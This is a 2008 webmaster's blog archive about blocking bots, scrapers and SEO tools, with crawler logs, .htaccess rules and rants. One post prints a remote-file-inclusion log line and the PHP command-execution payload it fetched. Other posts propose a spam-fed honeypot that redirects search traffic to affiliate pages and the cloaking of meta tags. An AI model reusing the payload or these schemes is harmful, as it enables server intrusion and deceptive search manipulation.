Sunday, March 09, 2008

You Know You Drink Too Much When...

When you wake up face down in a pizza you know you got mad drinking skills, especially when you went face down in mid-bite of the pizza.

When you wake up and your pillow is covered in pizza vomit, that's madder skills cause you didn't die in your sleep aspirating on pizza vomit. Having to shave your beard off because you can't seem to wash out all the partially digested bits of pizza is a bit embarrassing. However, having the side of your face that laid on the pizza sauce all night get stained and looking bright red all day is priceless.

When you wake up under your bed, realize you're on cold hard wood, bump your head on wood when you try to get up and suddenly panic thinking you're in a coffin because it's all wood and you can't get up, you've truly arrived.

When leaving a party and the elevator makes your stomach flip-flop you panic as the doors open and vomit down the crack between the elevator and the wall and spew into the elevator shaft just because there's no where else to suddenly yak, you're working your way to be an AA superstar!

When you're leaving a party and have no other place than to barf in a water fountain in the lobby of an apartment complex and as you're leaving giggle as you hear people walk up to take a drink screaming, you're in the club!

When you barf up brightly colored red nacho chips and suddenly panic thinking your stomach is bleeding profusely until you remember what you ate .... and then drink too much and barf a couple of nights later just to make sure that's what it really was.

When you and your friends are out partying all night and you suddenly fill up the floor of the car with vomit and 6 of your friends bail out the window just to get away from you

You know your friends are all alkies too when the topic of conversation is always which one of you wussies is going to drop a street pizza or a technicolor yawn first

Another clue your friends have drinking problems is when they fall out of the car when they open the door

A clue something bad happened is when you wake up on a sofa in a house you don't remember, find your glasses in your pocket and when you put them on can't see thru the thick film of dry vomit that's encrusted them

FINALLY, last but not least, you know it's time to stop drinking when you wake up and flies are picking the vomit out of your nose.

What Time Is It Anyway?

Got up this morning and all the computers and TV's said it was 9:00am but the phones and alarm clocks said it was 8:00am.

Obviously this was the daylight savings bullshit gone bad but how in the hell could someone fuck up the atomic time clock which the alarms and phones feed from?

Had this been an actual day when I really needed to get up and be somewhere by 8am I would've been fucked since both the alarm clock and the alarm in the phone, which I prefer because it's louder, would've both malfunctioned.

Anyway, around 11:00am everything was back in synch.

Don't you just love fucking daylight savings time?

Blech.

There Goes the Bad Neighborhood

Isn't it ironic that a day after I wrote about stopping snooping SEO tool's here comes one of them trying to crawl one of my websites.

The user agent and IP address are:

208.77.208.198 [emeraldarborvitae.viviotech.net.]
"Bad-Neighborhood Link Analyzer (http://www.bad-neighborhood.com/)"
They were automatically blocked on my site because I white list only allowed user agents and they use an unauthorized user agent name, but they could always switch to mimic a browser so in the long run it's best to block the IP range.

Turns out Viviotech is the host of Bad Neighborhood's site:
OrgName: Vivio Technologies
NetRange: 208.77.208.0 - 208.77.211.255
CIDR: 208.77.208.0/22
After you block this data center range the tools from Bad Neighborhood can't be used to scan your site, check your Apache server headers, or any other thing.

Sorry, but you're not allowed back into my neighborhood.

Buh bye.

Saturday, March 08, 2008

Jayde NicheBot Crawls for iEntry's Web of Sites

Who out there remembers the Jayde directory?

Some of us submitted our sites to Jayde way back in '96 or '97, who knows exactly, and now our sites are being hit by something called the "Jayde NicheBot".

"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) Jayde NicheBot"
I was curious why some site I submitted to about 10 years ago was pinging my server all these years later so I did a little research to see what they'd been up to in the interim and they appear to have been very prolific, almost to domain park proportions.

Jayde is currently owned by iEntry.com and if you have McAfee SiteAdvisor enabled in your browser it goes RED meaning that iEntry has something negative on file with SiteAdvisor that says the following:
Feedback from credible users suggests that this site sends either high volume or 'spammy' e-mails.
Took a look and found someone that posted one of those 'spammy emails' with a ton of iEntry's domain names listed.

On iEntry's website they claim:
iEntry properties include more than 370 Web sites and over 100 e-mail newsletters that are viewed by more than 5 million users every month.
Did a quick search for their 370 sites and Yahoo finds over 170 of them.

It appears iEntry owns ExactSeek.com, sitepronews.com, webpronews.com, metawebsearch.com, seo-news.com (and forum), and a ton of directories, bunch of sites here, shitload of sites there, and last but not least here it's tied together with ISEDN.ORG

Google and Yahoo could find listings about my sites in a bunch of their directories which begs the question:

Why does Google and Yahoo index all those redundant directories?

I found references to my sites in about 40 of them, there's a shock, knock me over with a feather. About 40 sites was all Google and Yahoo would easily report, and the answer to the "why are they indexed?" question appears to be that the order of the listings in the directory are changed for the same content on a different site so it seems to be unique per directory as far as the search engines are concerned. Maybe there were other changes as well, I didn't look to deep.

However, I did check Live search which doesn't appear to be so gullible as it only reported the duplicate content in 5 sites.

Hey, submit your link, it's FREE and you can advertise too!

Hope I didn't blow out anyone's sarcasm meter with that last quip.

Friday, March 07, 2008

Slow Down Nosy SEO's and Snooping Competitors

Most webmasters spend a lot of time and effort working on marketing their website, or pay someone a lot of money to do this, yet don't do a few common sense things that keep lazy and nosy assed SEO's or other competitors from quickly analyzing all your hard work and simply stealing what you've done.

Not that you can completely stop them because much of the competitive information about who links to you is already public, collected by search engines and toolbars, but you can sure as hell make it a little more difficult to get the rest of the data they want.

Since the SEO Chicks published a list of competitive research tools to help those nosy SEO's snoop, I just thought it would be fair and useful to have a nice list of ways to stop as many of those those snooper tools as possible.

Block Archive.org - No need to let anyone see how your site evolved, snoop or even scrape through archive pages without your knowledge so block their crawler.

User-agent: ia_archiver
Disallow: /
Rumor has it that the ia_archiver may crawl your site anyway so adding it to your .htaccess file is a good precaution as well.
RewriteCond %{HTTP_USER_AGENT} ^ia_archive
RewriteRule ^.* - [F,L]
Block Search Engine Cache - Some people cloak pages and just show the search engines raw text yet show the visitors a complete page layout. Who cares, that's your business and a competitive edge you don't need to share, plus pages can be scraped from search engine cache as well, so disable cache on all pages.

Insert the following meta tag in the top of all your web pages:
<meta content='NOARCHIVE' name='ROBOTS'>
Block Xenu Link Sleuth - Why do you need people sleuthing your site? Screw 'em...

Add Xenu to your .htaccess file as well:
RewriteCond %{HTTP_USER_AGENT} ^ia_archive [OR]
RewriteCond %{HTTP_USER_AGENT} ^Xenu
RewriteRule ^.* - [F,L]
Make Your Domain Registration Private - Why give the SEO's or any other competitor any clues to help them whatsoever?

Sign up with DomainsByProxy and this will make the nosy little bastards happy:
WHATEVERMYDOMAINNAME.COM
Domains by Proxy, Inc.
DomainsByProxy.com
15111 N. Hayden Rd., Ste 160, PMB 353
Scottsdale, Arizona 85260
United States
Restrict Access To Unauthorized Tools - Use .htaccess to white list access to your site and just allow the major search engines and the most popular browsers which will block many other SEO tools. If you don't understand the white list method and it scares you, there's a few good black lists around too.

This is a limited sample for informational purposes only just to give an idea how it works, see the thread linked above for more in depth samples by WebSavvy, just be cautious in implementing a white list as it's very restrictive:
#allow just search engines we like, we're OPT-IN only

#a catch-all for Google
BrowserMatchNoCase Google good_pass

#a couple for Yahoo
BrowserMatchNoCase Slurp good_pass
BrowserMatchNoCase Yahoo-MMCrawler good_pass

#looks like all MSN starts with MSN or Sand
BrowserMatchNoCase ^msnbot good_pass
BrowserMatchNoCase SandCrawler good_pass

#don't forget ASK/Teoma
BrowserMatchNoCase Teoma good_pass
BrowserMatchNoCase Jeeves good_pass

#allow Firefox, MSIE, Opera etc., will punt Lynx, cell phones and PDAs, don't care
BrowserMatchNoCase ^Mozilla good_pass
BrowserMatchNoCase ^Opera good_pass

#Let just the good guys in, punt everyone else to the curb
#which includes blank user agents as well


order deny,allow
deny from all
allow from env=good_pass

Disclaimer: I don't use .htaccess for much so please don't ask for a complete file, this is just a sample as I use a more complex real-time PHP script to control access to my site.

Block Bots and Speeding Crawlers
- You can use something like the nifty PHP bot speed trap Alex Kemp has written or Robert Planks AntiCrawl. Just another layer of security piled on against snoops and scrapers that pretend to be MSIE or Firefox to avoid the white list or black list blocking in .htaccess.

Block Snoops From Robots.txt - Don't allow anyone other that your white listed bots to see your robots.txt file because it has other stuff in it that SEO snoops might find interesting, and it can become a security risk. Use a dynamic robots.txt file like this perl script on WebmasterWorld and just add the rest of your allowed bots to the code next to Slurp, Googlebot, etc.

Block DomainTools - since SEO's use it to snoop, no reason to let DomainTools have access so just block 'em.

Probably lot's of other things you should be blocking as well but this will give you a good start.

This list doesn't completely stop snoops from manually looking at your site, but it certainly stops all of those automated tools from ripping through all your pages, search engine or archive cache, and presenting a nice pretty report.

Heck, why should you help people take away your own money?

Start slowing them down today and stop the next up and comer from getting the info too easy.

UPDATE:

One more creative thing you can do to your website is cloak the meta tags so that only the search engines see them and disable the meta tags for normal visitors. Nothing really wrong with this because meta tags by definition are only for the search engines and snooping SEO's will be completely left in the dark when they can't see your meta keywords or description.

Especially if you combine cloaking meta tags with the NOARCHIVE option described above so then it's completely hidden from prying eyes.













Monday, February 18, 2008

Hakia Search Engine Spotted?

Hakia has been advertising their search engine in beta for quite some time and the only thing I've ever seen from them hitting my server is the following sporadic log entries:

06/28/2007 204.14.209.51 "Mozilla/4.0+"
10/05/2007 204.14.209.51 "Mozilla/4.0+"
11/09/2007 204.14.209.51 "Mozilla/4.0+"
12/19/2007 204.14.209.51 "Mozilla/4.0+"
02/18/2008 204.14.209.51 "Mozilla/4.0+"
Whatever it is didn't ask for robots.txt.

Here's their IP range:
HAKIA INC. IP00095 (NET-204-14-209-0-1)
204.14.209.0 - 204.14.209.255
Maybe someone knows more about this but I can't really find any information on them crawling and didn't notice anything on their site about them having a spider.

Thursday, February 14, 2008

MSIE 7 on Livebot IPs

Not sure what this means but I spotted an MSIE 7.0 user agent on the following Livebot IP addresses.

Here's the exact agent used:

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)
Here's the IPs involved:
65.55.165.119 [livebot-65-55-165-119.search.live.com.]
65.55.165.38 [livebot-65-55-165-38.search.live.com.]
65.55.165.53 [livebot-65-55-165-53.search.live.com.]
65.55.165.66 [livebot-65-55-165-66.search.live.com.]
65.55.165.96 [livebot-65-55-165-96.search.live.com.]
Could mean anything from Live testing who has rigid user agent checking to making screen shots or they're reusing those IPs for other internal purposes, hard to say.

What's not hard to say is that those IPs with that user agent got automatically blocked on my site for being the wrong thing in the wrong place.

Tuesday, February 12, 2008

Jazztel Scraping Hotzone

Found a hotzone of activity from jazztel.es which has been attempting to scrape like crazy since the first of the year. Obviously they didn't get very far but keep trying and trying and I looked at the acitivity and it's definitely a bot running on 87.218.70.*

Here's the number of attempted pages per IP:

785 - 87.218.70.251
661 - 87.218.70.231
630 - 87.218.70.41
346 - 87.218.70.120
336 - 87.218.70.196
334 - 87.218.70.12
334 - 87.218.70.100
333 - 87.218.70.135
329 - 87.218.70.203
328 - 87.218.70.107
283 - 87.218.70.178
199 - 87.218.70.174
So it's probably a good idea to block 87.218.70.* just to be safe.

Wednesday, January 30, 2008

Make Money With a Black Hat Honeypot

Instead of trying to fight forum, blog and wiki spam it finally dawned on me that I was taking the wrong approach, don't fight the Black Hat spammers, monetize them!

The basic concept is built around the black hat spammers love of spamming so the first thing you need to do is set up a bunch of fake forums, blogs and wiki's using the popular open source software that the spammers love most. The trick is NOT to install any form of spam controls whatsoever, no captcha, no Askimet, nothing that will slow the spammer down. Let the spammers go wild with your honeypot site and let them make fake profiles, create spam threads and comments, it doesn't matter because we call all this spam "content" for this purpose.

For those advanced webmasters, take a look at some automatic content creation techniques that you can use to prime the honeypot sites with hundreds of bogus threads and blog posts of gibberish. This will trick the spammers into thinking you have a popular site where there will be lots of eyeballs looking at their spam yet nothing could be further from the truth as nobody will ever see their spam. If you want to be truly creative, use the text jumble or synonym switch on each spammers post to avoid duplicate content and also avoid matching their spam footprint which could be easily detected.

Right about now you must be asking yourself:
"Why in the hell would I build a site designed to be spammed?"

The answer is simple, the spam will become your content and hopefully your honeypot sites will pick up some traffic from the search engines. Best of all, the spammers will keep hitting your site daily so you'll have fresh content and we know how the search engines just love fresh content.

Once you get this traffic from the search engine, simply redirect that traffic to the appropriate affiliate landing page based on the search keyword and VOILA! you start making sales and the free money starts rolling in with the spammers doing all the work.

So there you have a simple yet elegant solution in one neat little bundle to let spammers make you money while you screw them over wasting their time spamming your honeypot sites.

Enjoy.

Very Bad Behavior for Crashed Joomla! Sites

Which is worse, a little spam or being offline for a month?

A major example shown below is because the bot blocker can crash the whole site and this poor webmaster has been in this state at a minimum, according to Google cache, since "retrieved on Jan 24, 2008". However, Live says the same site has been this way since "our crawler examined the site on 1/11/2008", so it's much worse.

Then I found another site down all month as Google cache shows "retrieved on Jan 2, 2008" so they've not only had anti-spam but anti-visitor as well, nothing to worry about.

Warning: botbehavior_bot() [function.botbehavior-bot]: SAFE MODE Restriction in effect. The script whose uid is 3647 is not allowed to access /home/xxx/public_html/mambots/system/bad-behavior/bad-behavior-joomla.php owned by uid 80 in /home/xxx/public_html/mambots/system/bb2_bot.php22

Warning:botbehavior_bot(/home/xxx/public_html/mambots/system/bad-behavior/bad-behavior-joomla.php) [function.botbehavior-bot]: failed to open stream: Unknown error: 0 in /home/xxx/public_html/mambots/system/bb2_bot.php on line 22

Fatal error: botbehavior_bot() [function.require]: Failed opening required '/home/xxx/public_html/mambots/system/bad-behavior/bad-behavior-joomla.php' (include_path='.:/usr/local/lib/php-4.4.7/lib/php') in /home/xxx/public_html/mambots/system/bb2_bot.php on line 22

Looked around the web and there are other Joomla! sites with similar issues as well which weren't completely fatal. I'm not sure why a few sites just crashed with the errors while others proceeded to display errors with page content.

All I can say is that these webmasters need a good site monitoring alarm service at a minimum.

Saturday, January 26, 2008

Yahoo Slurp Using New IPs

Yesterday my bot blocker notified me of a new range of IPs being used by Slurp that I haven't seen before.

This is a prime example of why I keep telling people that still use IP checking only to update their code and use full trip DNS checking to validate major search engines to avoid bouncing spiders with new IPs but people just don't listen.

Hope the following helps for anyone still validating Slurp by IP only.

The user agent:

"Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
A few reverse DNS samples:
67.195.44.83 [lm302008.crawl.yahoo.net.]
67.195.44.80 [lm302005.crawl.yahoo.net.]
67.195.44.84 [lm302009.crawl.yahoo.net.]
67.195.44.103 [lm302028.crawl.yahoo.net.]
67.195.44.100 [lm302025.crawl.yahoo.net.]
67.195.44.96 [lm302021.crawl.yahoo.net.]
67.195.44.99 [lm302024.crawl.yahoo.net.]
67.195.44.92 [lm302017.crawl.yahoo.net.]
The complete list of new IPs Slurp used:
67.195.44.100
67.195.44.101
67.195.44.102
67.195.44.103
67.195.44.109
67.195.44.75
67.195.44.76
67.195.44.77
67.195.44.78
67.195.44.79
67.195.44.80
67.195.44.81
67.195.44.82
67.195.44.83
67.195.44.84
67.195.44.85
67.195.44.86
67.195.44.87
67.195.44.89
67.195.44.90
67.195.44.91
67.195.44.92
67.195.44.93
67.195.44.94
67.195.44.95
67.195.44.96
67.195.44.97
67.195.44.98
67.195.44.99

Apollo Hosting Shared Server Customers Appear To Be Hacked

One of my websites is a directory and when I last ran my link checker about 10 days ago, to validate that the sites were all still valid, several of them triggered a test that I installed to check for hacked sites. After doing a little bit of research they all turned out the be hosted on Apollo Hosting.

What I found were very large blocks of ads embedded in the home page of each compromised site for every kind of pharma product you've ever seen spammed with their links pointing to landing pages on multiple compromised servers including several universities. Some of the landing pages are also hosted on Apollo Hosting so they are being used to host both the hackers pharma links and pharma landing pages.

Took a quick look in Google and found a lot of references in Google about individual sites on Apollo being hacked but I don't think they know the extent of the problem.

Please note that these types of hackers don't seem infect every account on the server, they just infect a chunk of them based on some unknown criteria, so it's hit and miss which domains are infected. Perhaps individual accounts were hacked but I don't think so as I've seen this same type of thing on iPowerWeb (which now appears cleaned up), random sites, some servers had more sites infected, others just a few, who knows why.

Here's a few examples, view the HTML source to see all the embedded pharma ads typically at the bottom of the page:

Caution: disable javascript before you go to any domain

Server: secure1.apollohosting.com
Domains: http://whois.webhosting.info/206.125.215.251?pi=4&ob=SLD&oo=ASC
Sample 1: view-source:http://oceancyclery.com/
Sample 2: view-source:http://oldpeking.com/

Server: secure2.apollohosting.com
Domains: http://whois.webhosting.info/206.125.215.252
Sample 1: view-source:http://armandmercury.com/
Sample 2: view-source:http://altonaequipment.com/

Server: secure4.apollohosting.com
Domains: http://whois.webhosting.info/206.125.215.254
View the source on any domain in the list, not all are infected but it's a more
heavily server wide infestation...

So on and so forth, you get the idea.

I spot checked a handful of servers, but based on what I've run across in the past with other similar shared server infestations it's probably on all shared servers.

DISCLAIMER: The sites and servers referenced still contained the pharma ads at the time of this writing and may be cleaned up in the future. Follow the links to check the domains hosted to see if the problem still exists in the future.

Sunday, January 20, 2008

Sprint Broadband Saves Bacon Again

Last night I was working quickly trying to stop some asshole that I found attacking my site and was just about finished with the task when suddenly BLAMMO! my SSH session terminated.

My first thought was I had just done something bad and whacked the server.

In a bit of a panic I try to pull up the site in the Firefox, nothing, dead.

Is my internet connection down?

Nope, I can get to other web sites and my other servers in different data centers just fine.

Must be Comcast having a routing problem so I quickly confirm that there's a routing issue with a traceroute and breath a sigh of relief when I can access that server via my other server.

However, this doesn't solve the problem of the asshole that was waging war on my server still abusing the damn thing. The attacker was using a huge proxy list that was more current than mine plus some other things so it wasn't as simple as just blocking a single IP address or anything like that.

So I grabbed the Sprint Broadband USB stick, plugged it in, and a minute later was back on the server via a different network connection and finished blocking the attacker.

A few hours later Comcast was functioning properly again, but thanks to Sprint Broadband I no longer feel like I'm being held hostage when Comcast's service has problems.

Having the Sprint Broadband backup is definitely not a cheap solution but it's saved my ass a few times and now I no longer need to chase Wifi hotspots when I'm on the road. If you can afford the extra $60/month for internet connection redundancy I highly recommend getting a Sprint Broadband card or an equivalent from other providers. I'll think I'll stick with Sprint until something better and faster comes along in my area!

Friday, January 18, 2008

Botnet Whacks ROBOTS.TXT File

Just when you think having your server hacked is bad enough, these idiots start messing with your robots.txt file.

Here's an example:

83.133.96.246 "GET //errors.php?error=http://www.thefalife.com/robots.txt??? HTTP/1.0" "libwww-perl/5.48"
What did that robots.txt contain?
<?php
echo "549821347819481
";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd."
";
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;
Looks like botnets are now OK with messing up your search engine positions as well as messing up your server.

Just imagine that all the pages or images you have blocked are suddenly crawled.

Then imagine that every junk crawler you've denied is suddenly crawling all over your site.

It could take months or years to clean up the damage, if ever.

Fun, huh?

Friday, January 11, 2008

Defective Norton AV Dumped for Avast, PC Runs Better!

Before you start hammering on me about Norton Anti-Virus being crappy bloatware, I already knew that, but it came pre-installed with the machine, never caused a problem other than a little slowness now and then, so just using it was easier that installing something new.

However, a couple of days ago Norton AV puked when I rebooted the machine and all bets were off.

Norton AV claimed that something Norton needed was no longer registered and directed me to some auto-fix located on their website. The auto-fix was a piece of shit, got a couple of web errors trying to use it. Finally, it was downloaded and ran but coughed up an error at the end telling me to run it again. Ran it again and it said it was installed properly and I should reboot. Rebooted the machine and it said the same shit wasn't registered and the same auto-fix said it was fixed.

I hate this fucking shit.

OK, fine, let's just uninstall and re-install Norton, that should fix the problem.

Yup, that error was fixed but I got 2 new ones in it's place.

FUCK!

OK, managed to resolve those errors and now Norton seems to be running fine.

Seems to be running fine is the operative phrase here.

Part of the Live Update won't update, keeps spiking the CPU and memory consumption, it's out of control. Tried to fix it to no avail because it seems that the file it downloaded to update just won't install properly so it's fucked and it locks up the machine trying to install it meaning I'm fucked when it's running.

To be quite blunt, I simply got tired of fucking with it at this point.

Simple solution, BYE BYE NORTON!

I use AVG on another machine and it's OK but I thought I'd give Avast a try this time.

Downloaded Avast and installed without a hitch, smooth sailing, no bullshit.

The best part is, Avast loads and runs faster so now my PC boots quicker and runs faster overall.

No more bloated Norton AV ever again and if Avast keeps working this good they'll keep my business.

Thursday, January 10, 2008

Scraping South of the Border

Never really had much of a problem with scrapers from Mexico before but today one came bouncing through Megared's proxy server:

200.52.167.3 [customer-CLN-167-3.megared.net.mx.] requested 11 pages as "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

200.52.167.8 [customer-CLN-167-8.megared.net.mx.] requested 156 pages as "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

200.52.167.4 [customer-CLN-167-4.megared.net.mx.] requested 31 pages as "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

200.52.167.9 [customer-CLN-167-9.megared.net.mx.] requested 36 pages as "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
They were just speeding through read fast asking just for pages, nothing else, the typical scraper.

Not much you can do about proxy servers and IP pools without punishing the innocent except set it to challenge all future accesses but that's a bit extreme for a single instance.

It's not like the crazy shit that comes from airtelbroadband.in, but that's a different blog post.

Tuesday, January 08, 2008

Harry Down Under

Something calling itself "Harry" has been hitting one of my sites since June '07 and seems to hit for a couple of days, go away a week or two, come back, repeat and rinse as needed.

Here's what Harry TRIED to do today:

203.6.205.34 - "GET /contact.html" 301 "Harry"
203.6.205.34 - "GET /contact.html" 200 "Harry"
203.6.205.34 - "GET / " 301 "Harry"
203.6.205.34 - "GET / " 200 "Harry"
203.6.205.34 - "GET /robots.txt" 301 "Harry"
203.6.205.34 - "GET /robots.txt" 200 "Harry"
Did you notice Harry stutters?

That's because he keeps asking for my domain without the WWW so he gets a redirect and then hits the bot blocker head on.
203.6.205.34 [203-6-205-34.reed-elsevier.com.au.]
Now that you know Harry is an Aussie the title will make more sense. ;)

Needless to say, I'm NOT just wild about Harry.

Bot Blockers Beware! New UK Threat!

When I saw this in my bot blockers' log today it sent shivers down my spine.

What evil genius came up with this?

217.206.231.140 "fake_user_agent Mozilla/9.0 (compatible; MSIE)"
I'm not sure we can stop this one...

French Speaking Scrapers Needed - Apply Within

This morning I found this little French gem sitting in the bot blockers' Inbox direct from optioncarriere.com which appears to be a crawler looking for job listings.

First they tried libwww:

193.238.230.109 "GET / " "libwww-perl/5.805"
193.238.230.109 "GET / " "libwww-perl/5.805"
193.238.230.109 "GET / " "libwww-perl/5.805"
193.238.230.109 "GET / " "libwww-perl/5.805"
Sacrebleu! Zee LEEB WWW duz not wurk!

VITE! VITE! Youze zee Mozeeluh!
193.238.230.109 "GET / " "Mozilla/5.0 (compatible)"
Merde!

Sunday, January 06, 2008

Active Web Reader Causes IEAutoDiscovery Hell

Installed this RSS feed reader called Active Web Reader on the Vista laptop the other day and it went off hammering my server with requests from "IEAutoDiscovery" that resembled a fucking DoS on one of my websites.

At first I thought I'd just been fucked over with malware in the download until I remembered what it said on their web site:

"Active Web Reader has a unique feature, called Auto Discovery, that automatically discovers RSS feeds while you browse the Internet using Internet Explorer."
Auto Discovery my ass, this is Auto Denial of Service attack!
xx.xx.xx - - [17:53:40] "GET /somepage.html" "IEAutoDiscovery"

... shitload of requests sometimes hitting 2 and 3 pages per second

xx.xx.xx - - [18:31:17] "GET /somepage.html" "IEAutoDiscovery"
Maybe it malfunctioned in Vista, who knows, because I've never seen IEAutoDiscovery run amok like this before, but in less than 40 minutes this fucking thing pulled down 647 pages when the site has less than 50. That means this tool kept hammering the same pages over and over and over, ever hear of the word CACHE?

Fuck me.

Uninstalled and I'll never touch anything from them again.